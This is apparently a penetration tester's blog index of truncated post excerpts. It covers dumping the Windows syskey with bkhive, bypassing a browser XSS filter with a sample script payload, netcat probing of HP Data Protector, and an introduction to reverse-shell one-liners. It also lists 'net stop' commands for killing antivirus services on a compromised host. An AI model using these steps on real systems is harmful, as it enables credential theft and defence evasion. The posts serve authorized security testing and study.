Simply drop in your backtrack5 CD or USB and boot from the inserted media. Once booted type startx, you can do everything from the console but it’s nicer to have a pretty GUI!
Left click Places at the top and then click on the windows partition you wish to mount. Then open a terminal and first of all use bkhive to dump the syskey bootkey from the windows hive.… Continue reading
So you’ve got some XSS that you want to test but the browser you’ve been using for your app testing is protecting against the use of javascript in the address URL. The following URL:
1http://example.com/index.asp?val=<script>alert(1)</script>Would end up getting sent to the server as:
1GET /index.asp?val=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1In order to prevent this so we can test XSS flaws within applications we need to turn off the javascript filter in the… Continue reading
There are many pages on the web documenting quick reverse shell one liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them but I wanted to recapture what they’ve got for my notes purposes. (It’s easier for me to find stuff if it’s in one place). All credit goes to both of those guys where I got all this info from.
Step one – Set up… Continue reading
Ok so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service(all of the output below is from my own testbed, hence the local 192.168.x.x IPs):
1234root@bt:~# nc 192.168.0.18 5555 break HP Data Protector A.06.11: INET, internal build 243, built on 25 August 2009, 13:08 root@bt:~#This version is flagged as vulnerable as… Continue reading
So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.
Here’s a quick list of services to kill:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161net stop "Ahnlab Task Scheduler" net stop "altiris client service" net stop ANTIVIR net stop ATRACK net stop "avast! antivirus" net stop "avast! iavs4 control service" net stop AVCONSOL net stop "AVG6 Service" net… Continue reading